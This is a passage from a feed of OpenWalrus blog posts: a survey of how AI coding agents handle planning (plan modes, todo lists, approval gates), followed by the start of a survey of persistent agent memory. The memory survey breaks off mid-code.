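
def execute(step, log):
    log.append(step)  # a real executor would edit files or run commands here

def solve(issue):
    context = investigate_repo(issue)
    plan = make_plan(context)  # plan first...
    log = []
    for step in plan:
        execute(step, log)     # ...then act; step 5 would test and revise
    return log
```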

&lt;p&gt;The planning step isn't decorative — it's how they hit 74.4% on&lt;br&gt;
SWE-bench Verified. And interestingly, they found that removing a&lt;br&gt;
separate &lt;code&gt;strategic_planning()&lt;/code&gt; tool powered by o3 actually &lt;em&gt;improved&lt;/em&gt;&lt;br&gt;
results once they upgraded to Claude 4 Sonnet: the frontier model&lt;br&gt;
handles planning as part of its reasoning, rather than as a separate&lt;br&gt;
explicit step.&lt;/p&gt;

&lt;p&gt;This points to something important: &lt;strong&gt;planning doesn't always need to&lt;br&gt;
be a separate mode.&lt;/strong&gt; It needs to happen, but where it lives in the&lt;br&gt;
architecture varies.&lt;/p&gt;

&lt;h2&gt;
  
  
  How five systems handle planning
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Claude Code: plan mode + TodoWrite
&lt;/h3&gt;

&lt;p&gt;Claude Code has the most explicit plan-execute separation of any system&lt;br&gt;
we surveyed. It ships two mechanisms:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plan mode&lt;/strong&gt; (activated with &lt;code&gt;/plan&lt;/code&gt; or Shift+Tab twice) is a&lt;br&gt;
&lt;a href="https://claudelog.com/mechanics/plan-mode/" rel="noopener noreferrer"&gt;read-only operating phase&lt;/a&gt;&lt;br&gt;
where Claude can only observe, analyze, and write to a plan file —&lt;br&gt;
no edits, no shell commands. The plan is written to a markdown file in&lt;br&gt;
&lt;code&gt;~/.claude/plans/&lt;/code&gt;. The user can open it with Ctrl+G, edit it, remove&lt;br&gt;
steps they don't want, and then approve. Claude exits plan mode and&lt;br&gt;
implements exactly what was agreed.&lt;/p&gt;

&lt;p&gt;What's notable about this design: &lt;a href="https://agiinprogress.substack.com/p/mastering-claude-code-plan-mode-the" rel="noopener noreferrer"&gt;Claude Code's creator Boris Cherny&lt;br&gt;
uses it himself&lt;/a&gt;&lt;br&gt;
— start in plan mode, iterate until the plan is right, then switch to&lt;br&gt;
auto-accept for execution. Plan mode is also fast: since Claude isn't&lt;br&gt;
running tools or writing files, responses are much quicker and cheaper.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TodoWrite&lt;/strong&gt; is the execution-side complement. During implementation,&lt;br&gt;
Claude maintains a structured task list — pending, in-progress,&lt;br&gt;
completed. It marks tasks done immediately as they finish, with exactly&lt;br&gt;
one task in-progress at a time. The todo list is visible to the user&lt;br&gt;
throughout execution, providing a live view of what's happening and&lt;br&gt;
what's left.&lt;/p&gt;
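&lt;p&gt;That discipline reads naturally as a small state machine. A toy sketch of the convention (not Claude Code's actual implementation):&lt;/p&gt;

```python
# Toy TodoWrite-style task list: statuses are tracked explicitly, and
# starting a task requires that nothing else is in progress.
class TodoList:
    def __init__(self, tasks):
        self.status = {t: "pending" for t in tasks}

    def start(self, task):
        busy = [t for t, s in self.status.items() if s == "in-progress"]
        assert not busy, "exactly one task may be in progress at a time"
        self.status[task] = "in-progress"

    def finish(self, task):
        self.status[task] = "completed"  # marked done immediately on completion

todos = TodoList(["write parser", "add tests"])
todos.start("write parser")
todos.finish("write parser")
todos.start("add tests")
```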

&lt;p&gt;The two mechanisms serve different phases:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Plan mode also has a subagent model — specialized agents (Plan, Explore,&lt;br&gt;
Task) that can be launched inside a session. The Plan agent is&lt;br&gt;
constrained to research tools only. The Task agent can use all tools.&lt;br&gt;
This mirrors the plan-execute split at the agent level, not just the&lt;br&gt;
session level.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cursor: plan mode + background agents + automations
&lt;/h3&gt;

&lt;p&gt;Cursor's architecture has evolved toward parallel, autonomous execution&lt;br&gt;
with planning as a first step.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent plan mode&lt;/strong&gt; lets the AI write a detailed Markdown plan before&lt;br&gt;
touching any code. PMs and engineers can review, edit inline, or store&lt;br&gt;
plans as reusable templates. The workflow: describe the task → agent&lt;br&gt;
produces a plan → user approves step-by-step → execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Background agents&lt;/strong&gt; take this further. You can push an agent run to&lt;br&gt;
the background while you keep coding — the agent works asynchronously,&lt;br&gt;
notifies you on completion or when it needs approval. Multiple agents&lt;br&gt;
can run in parallel on different tasks. Linear integration lets you&lt;br&gt;
start agent runs directly from issue workflows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Automations&lt;/strong&gt; (announced &lt;a href="https://techcrunch.com/2026/03/05/cursor-is-rolling-out-a-new-system-for-agentic-coding/" rel="noopener noreferrer"&gt;March 2026&lt;/a&gt;)&lt;br&gt;
go further still: agents triggered by events — a new commit, a Slack&lt;br&gt;
message, a PagerDuty incident, a timer. Cursor estimates it runs&lt;br&gt;
hundreds of automations per hour. An incident arrives in PagerDuty,&lt;br&gt;
an agent queries server logs via MCP, investigates, proposes a fix.&lt;/p&gt;

&lt;p&gt;The pattern: planning is the human checkpoint before autonomous&lt;br&gt;
execution. After approval, the agent runs without intervention until it&lt;br&gt;
needs another decision.&lt;/p&gt;

&lt;h3&gt;
  
  
  Devin: upfront planning with continuous revision
&lt;/h3&gt;

&lt;p&gt;Devin's approach is the most human-workflow-aligned. When you provide&lt;br&gt;
a task, Devin:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Inspects the repository&lt;/li&gt;
&lt;li&gt;Returns a step-by-step plan in seconds&lt;/li&gt;
&lt;li&gt;Waits for you to modify it before proceeding&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;a href="https://cognition.ai/blog/devin-2" rel="noopener noreferrer"&gt;Devin 2.0 architecture&lt;/a&gt;&lt;br&gt;
makes plan revision central — &lt;em&gt;"the plan changes a lot over time."&lt;/em&gt;&lt;br&gt;
This isn't a failure mode, it's the design. As Devin investigates,&lt;br&gt;
discovers constraints, and runs into dead ends, it updates the plan.&lt;br&gt;
The user can see and redirect at any point.&lt;/p&gt;

&lt;p&gt;Devin also runs a separate &lt;strong&gt;review agent&lt;/strong&gt; that pressure-tests the&lt;br&gt;
implementation after the writing agent finishes. One agent writes,&lt;br&gt;
another critiques. The review agent can trigger another round of&lt;br&gt;
fixes — a closed loop that doesn't require user input unless it gets&lt;br&gt;
stuck.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Windsurf: three modes with megaplan
&lt;/h3&gt;

&lt;p&gt;Windsurf's Cascade has &lt;a href="https://docs.windsurf.com/windsurf/cascade/cascade" rel="noopener noreferrer"&gt;three distinct modes&lt;/a&gt;:&lt;br&gt;
&lt;strong&gt;Ask&lt;/strong&gt; (conversation), &lt;strong&gt;Code&lt;/strong&gt; (execution), and &lt;strong&gt;Plan&lt;/strong&gt; (planning only).&lt;/p&gt;

&lt;p&gt;Plan mode produces a structured implementation plan before any code is&lt;br&gt;
written. The &lt;code&gt;megaplan&lt;/code&gt; command triggers an advanced variant that asks&lt;br&gt;
clarifying questions before generating a more comprehensive plan —&lt;br&gt;
useful for large, ambiguous tasks where the agent needs to reduce&lt;br&gt;
uncertainty before proposing an approach.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://windsurf.com/changelog/windsurf-next" rel="noopener noreferrer"&gt;Wave 13&lt;/a&gt; added parallel&lt;br&gt;
multi-agent sessions with Git worktrees and side-by-side Cascade panes.&lt;br&gt;
Multiple plans can execute simultaneously in isolated branches.&lt;/p&gt;

&lt;h3&gt;
  
  
  GitHub Copilot Workspace: plan as the entry point
&lt;/h3&gt;

&lt;p&gt;GitHub Copilot Workspace makes planning the primary interface. You&lt;br&gt;
don't start by describing code changes — you start with an issue or&lt;br&gt;
goal, and Copilot generates a plan: which files to touch, what to&lt;br&gt;
change, why. You edit the plan directly before any code is generated.&lt;/p&gt;

&lt;p&gt;The plan is the artifact. Code generation is downstream of it.&lt;/p&gt;

&lt;p&gt;This is the most explicit "plan is a user-editable document" design&lt;br&gt;
in the survey — but &lt;a href="https://windsurf.com/compare/windsurf-vs-github-copilot" rel="noopener noreferrer"&gt;reviews note&lt;/a&gt;&lt;br&gt;
that Copilot's planning remains shallower than dedicated agent systems:&lt;br&gt;
it sometimes abandons plans mid-execution or generates plans that don't&lt;br&gt;
reflect the actual implementation complexity.&lt;/p&gt;

&lt;h2&gt;
  
  
  Patterns across systems
&lt;/h2&gt;

&lt;p&gt;The radar above shows capability coverage. This chart shows &lt;em&gt;when&lt;/em&gt; in&lt;br&gt;
the workflow each system allows planning to happen — pre-execution only,&lt;br&gt;
mid-execution, or post-write:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Five patterns appear consistently across all systems:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Plan before executing, not during.&lt;/strong&gt; Every system separates the&lt;br&gt;
analysis phase from the action phase. The plan is generated, reviewed,&lt;br&gt;
and approved before any files are touched. This isn't just a UX&lt;br&gt;
pattern — it reduces irreversible errors and aligns the agent's&lt;br&gt;
understanding with the user's intent before the costly part starts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Plans are visible and editable.&lt;/strong&gt; Opaque planning that the user&lt;br&gt;
can't inspect or modify produces anxiety and distrust. Every system&lt;br&gt;
that succeeded with developers (Devin, Claude Code, Cursor) makes the&lt;br&gt;
plan an artifact you can read and modify. The agent is a collaborator&lt;br&gt;
proposing a plan, not a black box executing one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Task tracking during execution.&lt;/strong&gt; Plans decompose into tasks.&lt;br&gt;
Tasks are tracked with status (pending / in-progress / done). The&lt;br&gt;
user can see where execution is at any moment. This matters for long&lt;br&gt;
tasks — without it, the agent feels like a black box even when it's&lt;br&gt;
working correctly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Approval gates.&lt;/strong&gt; Users approve the plan before execution begins.&lt;br&gt;
Some systems (Devin) also checkpoint at ambiguous decision points&lt;br&gt;
during execution. The key insight: approval gates are not friction —&lt;br&gt;
they're the mechanism that makes autonomous execution feel safe enough&lt;br&gt;
to allow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Plan revision as a feature, not a failure.&lt;/strong&gt; Devin's explicit&lt;br&gt;
position that "the plan changes a lot over time" reflects a mature&lt;br&gt;
understanding of software tasks. Plans made with incomplete information&lt;br&gt;
need to evolve. Systems that treat the initial plan as fixed become&lt;br&gt;
brittle.&lt;/p&gt;

&lt;h2&gt;
  
  
  The academic framing
&lt;/h2&gt;

&lt;p&gt;This pattern has a name in the research literature:&lt;br&gt;
&lt;strong&gt;plan-then-execute&lt;/strong&gt; agents, a lineage that traces back to classical&lt;br&gt;
HTN (Hierarchical Task Network) planning, now applied to LLMs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://blog.langchain.dev/planning-agents/" rel="noopener noreferrer"&gt;LangChain's plan-and-execute agent design&lt;/a&gt;&lt;br&gt;
formalizes this for harder tasks: a planner LLM generates a full task&lt;br&gt;
list, an executor LLM works through each task, and the planner can&lt;br&gt;
revise based on execution feedback. The separation of planner and&lt;br&gt;
executor allows each to be tuned independently — the planner optimized&lt;br&gt;
for decomposition quality, the executor for reliable task completion.&lt;/p&gt;

&lt;p&gt;Recent work on &lt;a href="https://openreview.net/forum?id=9R2iUHhVfr" rel="noopener noreferrer"&gt;SWE-bench Pro&lt;/a&gt;&lt;br&gt;
(long-horizon software engineering tasks) shows that planning quality&lt;br&gt;
is the primary bottleneck for agents on complex multi-session tasks —&lt;br&gt;
not execution ability. Agents that can generate accurate plans for&lt;br&gt;
multi-day tasks dramatically outperform reactive agents on the same&lt;br&gt;
tasks.&lt;/p&gt;

&lt;p&gt;The flip side: &lt;a href="https://refact.ai/blog/2025/1-agent-on-swe-bench-verified-using-claude-4-sonnet/" rel="noopener noreferrer"&gt;Refact.ai's SWE-bench findings&lt;/a&gt;&lt;br&gt;
show that for well-scoped single-issue tasks, frontier models can&lt;br&gt;
internalize planning as part of reasoning — a separate &lt;code&gt;strategic_planning()&lt;/code&gt;&lt;br&gt;
step adds latency without adding quality. The right architecture&lt;br&gt;
depends on task horizon and ambiguity.&lt;/p&gt;

&lt;h2&gt;
  
  
  The hidden truth: plan mode is a prompt
&lt;/h2&gt;

&lt;p&gt;Before drawing conclusions for walrus, there's a finding worth surfacing&lt;br&gt;
directly. &lt;a href="https://lucumr.pocoo.org/2025/12/17/what-is-plan-mode/" rel="noopener noreferrer"&gt;Armin Ronacher reverse-engineered Claude Code's plan&lt;br&gt;
mode&lt;/a&gt; and found:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"It is in fact just a rather short predefined prompt that enters plan&lt;br&gt;
mode. The tool to enter or exit plan mode is always available."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;There is no runtime enforcement.&lt;/strong&gt; No tool restrictions. No locked-down&lt;br&gt;
execution context. Claude Code's plan mode is a system prompt injection&lt;br&gt;
that says "do not execute yet" — and the model follows it because it's&lt;br&gt;
instructed to, not because the runtime enforces it.&lt;/p&gt;

&lt;p&gt;This is confirmed by a GitHub issue requesting&lt;br&gt;
&lt;a href="https://github.com/anthropics/claude-code/issues/15800" rel="noopener noreferrer"&gt;skill-based plan mode customization&lt;/a&gt;:&lt;br&gt;
users discovered that planning behavior can be fully replicated with a&lt;br&gt;
slash command that injects the right prompt. The magic is linguistic, not&lt;br&gt;
architectural.&lt;/p&gt;
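&lt;p&gt;As a concrete illustration, a plan-mode-style behavior can be induced with nothing more than an injected instruction along these lines (our paraphrase, not Claude Code's actual prompt text):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;You are in plan mode: a read-only phase.
Do not edit files or run shell commands yet.
Investigate the task, then write a step-by-step plan to a plan file.
Wait for explicit user approval before leaving plan mode.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;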

&lt;p&gt;The same is true for TodoWrite. The model marks tasks done because it's&lt;br&gt;
instructed to follow that convention — not because the runtime tracks&lt;br&gt;
task state.&lt;/p&gt;

&lt;h2&gt;
  
  
  What this means for walrus
&lt;/h2&gt;

&lt;p&gt;This finding reshapes the architecture question. Planning behavior&lt;br&gt;
doesn't need runtime primitives — it needs good skills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plans are prompts. They belong in skills.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A &lt;code&gt;planning&lt;/code&gt; skill encodes: write a plan file before acting on complex&lt;br&gt;
tasks, ask for approval before executing destructive changes, update&lt;br&gt;
the plan as you learn more. This is pure behavioral instruction —&lt;br&gt;
the same thing Claude Code does, but as a shareable, community-maintained&lt;br&gt;
skill rather than a baked-in mode. Any walrus user can install it,&lt;br&gt;
modify it, or replace it with their own variant.&lt;/p&gt;
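&lt;p&gt;A hypothetical sketch of what such a skill's instructions might look like (not an actual walrus skill file):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: planning
instructions:
  - On complex tasks, write a plan file before touching any code.
  - Ask for approval before any destructive or irreversible change.
  - Update the plan file as new constraints are discovered.
  - Keep exactly one task in progress at a time.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;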

&lt;p&gt;This fits &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;less code, more skills&lt;/a&gt; exactly.&lt;br&gt;
The planning behavior that every team has different opinions about —&lt;br&gt;
how verbose the plan should be, when to ask for approval, how to format&lt;br&gt;
task lists — is precisely the kind of thing that doesn't belong hardcoded&lt;br&gt;
in a runtime.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The open question is observability.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Plan mode being a prompt settles the planning side. But it surfaces a&lt;br&gt;
harder problem: when an agent dispatches a subagent, neither the parent&lt;br&gt;
agent nor the user has visibility into what the subagent is doing.&lt;br&gt;
Claude Code emits &lt;code&gt;SubagentStart&lt;/code&gt;/&lt;code&gt;SubagentStop&lt;/code&gt; hook events —&lt;br&gt;
lifecycle signals only. There is no structured "what is this agent&lt;br&gt;
working on right now" signal. The&lt;br&gt;
&lt;a href="https://github.com/anthropics/claude-code/issues/24537" rel="noopener noreferrer"&gt;feature request for an agent hierarchy dashboard&lt;/a&gt;&lt;br&gt;
is open and unanswered.&lt;/p&gt;

&lt;p&gt;That's the problem worth solving at the runtime level — not plan mode.&lt;br&gt;
We'll cover the design in a follow-up post.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://lucumr.pocoo.org/2025/12/17/what-is-plan-mode/" rel="noopener noreferrer"&gt;What is Claude Code's plan mode?&lt;/a&gt;
— Armin Ronacher's analysis of how plan mode actually works&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techcrunch.com/2026/03/05/cursor-is-rolling-out-a-new-system-for-agentic-coding/" rel="noopener noreferrer"&gt;Cursor Automations&lt;/a&gt;
— TechCrunch on Cursor's event-driven agent system&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://cognition.ai/blog/devin-2" rel="noopener noreferrer"&gt;Devin 2.0&lt;/a&gt; — Cognition's plan-revise loop&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://refact.ai/blog/2025/1-agent-on-swe-bench-verified-using-claude-4-sonnet/" rel="noopener noreferrer"&gt;Refact.ai SWE-bench&lt;/a&gt;
— when explicit planning helps vs. when it doesn't&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Less code, more skills&lt;/a&gt; — walrus's design principle&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;How AI agents remember&lt;/a&gt; — our memory survey&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://openwalrus.xyz/docs/walrus/getting-started/installation" rel="noopener noreferrer"&gt;Get started with OpenWalrus →&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>How AI agents remember: a survey of persistent memory</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:53:09 +0000</pubDate>
      <link>https://forem.com/crabtalk/how-ai-agents-remember-a-survey-of-persistent-memory-3m3f</link>
      <guid>https://forem.com/crabtalk/how-ai-agents-remember-a-survey-of-persistent-memory-3m3f</guid>
      <description>&lt;p&gt;AI agents are stateless by default. Every session starts from zero — the context window&lt;br&gt;
fills up, the conversation ends, and everything is gone. But useful agents need to learn.&lt;br&gt;
They need to remember your preferences, your project structure, the mistakes they made&lt;br&gt;
yesterday.&lt;/p&gt;

&lt;p&gt;We surveyed five products — Claude Code, OpenClaw, ChatGPT, Cursor, and&lt;br&gt;
Windsurf — to understand how persistent memory actually works in production. Here's what we learned.&lt;/p&gt;

&lt;h2&gt;
  
  
  A taxonomy of agent memory
&lt;/h2&gt;

&lt;p&gt;Not all memory serves the same purpose. We identified six functional roles that keep&lt;br&gt;
appearing across products, even when they use different names for them.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;What it holds&lt;/th&gt;
&lt;th&gt;Persistence&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Working memory&lt;/td&gt;
&lt;td&gt;Current session context&lt;/td&gt;
&lt;td&gt;Ephemeral&lt;/td&gt;
&lt;td&gt;Chat history in context window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent profile&lt;/td&gt;
&lt;td&gt;Agent-specific persistent knowledge&lt;/td&gt;
&lt;td&gt;Durable, per-agent&lt;/td&gt;
&lt;td&gt;CLAUDE.md, .cursorrules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User profile&lt;/td&gt;
&lt;td&gt;User preferences, habits, personal info&lt;/td&gt;
&lt;td&gt;Durable, cross-agent&lt;/td&gt;
&lt;td&gt;ChatGPT's "memory" feature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Episodic memory&lt;/td&gt;
&lt;td&gt;Chronological interaction logs&lt;/td&gt;
&lt;td&gt;Timestamped&lt;/td&gt;
&lt;td&gt;JSONL session journals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semantic memory&lt;/td&gt;
&lt;td&gt;Searchable knowledge base&lt;/td&gt;
&lt;td&gt;Indexed&lt;/td&gt;
&lt;td&gt;RAG-backed vector store&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Date-anchored memory&lt;/td&gt;
&lt;td&gt;Time-stamped facts that expire&lt;/td&gt;
&lt;td&gt;Temporal&lt;/td&gt;
&lt;td&gt;"User is on vacation until March 15"&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Working memory&lt;/strong&gt; is what most people think of — the chat history sitting in the&lt;br&gt;
context window. It's fast but volatile. When the window fills up, something has to go.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent profile&lt;/strong&gt; is the agent's persistent identity. Claude Code uses CLAUDE.md files,&lt;br&gt;
Cursor uses &lt;code&gt;.cursorrules&lt;/code&gt;. These are always loaded at session start — they tell the&lt;br&gt;
agent &lt;em&gt;how to behave&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User profile&lt;/strong&gt; is different from agent profile, though products often conflate them.&lt;br&gt;
Agent profiles are scoped to one agent instance. User profiles span agents — your&lt;br&gt;
timezone, your communication style, your name. ChatGPT's memory feature is user-scoped.&lt;br&gt;
Claude Code's CLAUDE.md is agent-scoped.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Episodic memory&lt;/strong&gt; is the journal. Timestamped session logs — who said what, when,&lt;br&gt;
in what order. Usually stored as JSONL or in a database with temporal indices. Critical&lt;br&gt;
for debugging and context recall across sessions.&lt;/p&gt;
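&lt;p&gt;A minimal sketch of the journal pattern, with &lt;code&gt;io.StringIO&lt;/code&gt; standing in for a log file on disk and an illustrative record shape:&lt;/p&gt;

```python
import io
import json

# Sketch of an episodic journal: append-only JSONL, one timestamped event
# per line, replayable in order. io.StringIO stands in for a file on disk.
journal = io.StringIO()

def log_event(ts, role, content):
    record = {"ts": ts, "role": role, "content": content}
    journal.write(json.dumps(record) + "\n")

log_event("2026-03-15T17:53:09Z", "user", "fix the login bug")
log_event("2026-03-15T17:53:41Z", "agent", "reproduced; patching auth.py")

# replay: who said what, when, in what order
events = [json.loads(line) for line in journal.getvalue().splitlines()]
```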

&lt;p&gt;&lt;strong&gt;Semantic memory&lt;/strong&gt; is the searchable layer. Vector embeddings, full-text search indices,&lt;br&gt;
or both. This is where RAG lives — the agent queries for relevant knowledge rather than&lt;br&gt;
loading everything into the prompt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Date-anchored memory&lt;/strong&gt; is the least common but arguably the most underbuilt. Facts&lt;br&gt;
with expiration dates — your current project deadline, a temporary API key, a colleague's&lt;br&gt;
vacation schedule. Most products store these the same way as permanent facts, which means&lt;br&gt;
they never expire.&lt;/p&gt;
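&lt;p&gt;Expiry-aware recall is a small filter once facts carry a date. A minimal sketch, assuming a fact-with-expiry schema of our own invention:&lt;/p&gt;

```python
from datetime import date
from operator import lt  # lt(a, b) reads "a is before b"

# Sketch of date-anchored memory: each fact carries an expiry, and recall
# filters stale facts so they never reach the prompt. Schema is illustrative.
facts = [
    {"text": "User is on vacation", "expires": date(2026, 3, 15)},
    {"text": "Project deadline is Q2", "expires": date(2026, 6, 30)},
]

def active_facts(today):
    # drop any fact whose expiry date is before today
    return [f["text"] for f in facts if not lt(f["expires"], today)]
```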

&lt;h2&gt;
  
  
  How five products implement memory
&lt;/h2&gt;

&lt;p&gt;Each product makes different tradeoffs across the memory stack. Here's where&lt;br&gt;
they land:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The orange bars show &lt;strong&gt;inspectability&lt;/strong&gt; (can you read and edit the memory?) and the&lt;br&gt;
blue bars show &lt;strong&gt;searchability&lt;/strong&gt; (can the agent retrieve relevant memories at scale?).&lt;br&gt;
Claude Code and Cursor maximize human control. OpenClaw maximizes machine retrieval.&lt;br&gt;
ChatGPT scores low on both axes from a developer perspective — it's accessible to&lt;br&gt;
end users but opaque to builders.&lt;/p&gt;

&lt;h3&gt;
  
  
  Claude Code (Anthropic)
&lt;/h3&gt;

&lt;p&gt;Claude Code takes the simplest approach in this survey: &lt;strong&gt;files on disk&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CLAUDE.md&lt;/strong&gt; files act as the primary persistent memory. One per project root,
one global at &lt;code&gt;~/.claude/CLAUDE.md&lt;/code&gt;. Loaded into the system prompt on every session.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auto memory&lt;/strong&gt; accumulates in &lt;code&gt;~/.claude/projects/&amp;lt;project&amp;gt;/memory/&lt;/code&gt; — build
commands, architecture notes, debugging insights, workflow preferences. Written
automatically based on interaction patterns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Context compaction&lt;/strong&gt; kicks in when the context window fills up. The system
compresses prior messages automatically. Memory files persist across compaction
boundaries.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No RAG, no vector search.&lt;/strong&gt; Memory is loaded directly into the prompt or
read from files. Retrieval is file-path-based, not semantic.&lt;/li&gt;
&lt;li&gt;A growing &lt;strong&gt;third-party ecosystem&lt;/strong&gt; fills the gaps: claude-mem adds semantic
compression, memsearch provides markdown-first indexing, and Basic Memory offers
MCP-based persistent context.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The bet here is on &lt;strong&gt;human readability&lt;/strong&gt;. You can open CLAUDE.md in any text editor,&lt;br&gt;
see exactly what your agent knows, and change it. No database to query, no embeddings&lt;br&gt;
to inspect.&lt;/p&gt;
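&lt;p&gt;As a rough illustration of the files-on-disk model, a loader that concatenates a global memory file with a project-local one might look like this. The function and its merge order are our sketch, not Claude Code's actual implementation; only the file paths follow the conventions described above:&lt;/p&gt;

```python
from pathlib import Path

def load_file_memory(project_root: str, home: str) -> str:
    """Concatenate persistent memory files: global first, then project,
    so project-specific notes appear later and can refine global ones."""
    candidates = [
        Path(home) / ".claude" / "CLAUDE.md",    # global memory
        Path(project_root) / "CLAUDE.md",        # project memory
    ]
    sections = []
    for path in candidates:
        if path.is_file():
            sections.append(path.read_text())
    return "\n\n".join(sections)
```

&lt;p&gt;Everything stays cat-able and diff-able; the cost is that recall is limited to whatever fits in the prompt.&lt;/p&gt;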

&lt;h3&gt;
  
  
  OpenClaw
&lt;/h3&gt;

&lt;p&gt;OpenClaw has the most sophisticated retrieval pipeline of the products surveyed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi-layer architecture&lt;/strong&gt;: conversation history (working memory), long-term
memory store (durable facts), and session indexing (episodic recall).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SQLite + sqlite-vec&lt;/strong&gt; for storage — structured queries via SQL, semantic
similarity via vector embeddings, all in a single file.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hybrid search&lt;/strong&gt; combines cosine similarity (semantic match) with BM25-style
keyword matching. Neither method alone is sufficient — hybrid catches both
conceptual and literal matches.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pre-compaction memory flush&lt;/strong&gt;: before trimming the context window, the agent
is given an explicit turn to extract and persist all important facts. This is the
most interesting pattern in the survey — the agent itself decides what matters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Markdown-first philosophy&lt;/strong&gt; for memory content, with LLM-generated session
slugs for indexing (e.g., "debugging-auth-flow-march-7").&lt;/li&gt;
&lt;/ul&gt;
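&lt;p&gt;The hybrid search layer can be sketched in a few lines. This is a toy illustration of the blending idea, with trivial stand-ins for the embedding model and BM25 (a real system would use learned embeddings and a proper BM25 implementation):&lt;/p&gt;

```python
import math
from collections import Counter

def cosine(a, b):
    """Semantic match between two embedding vectors."""
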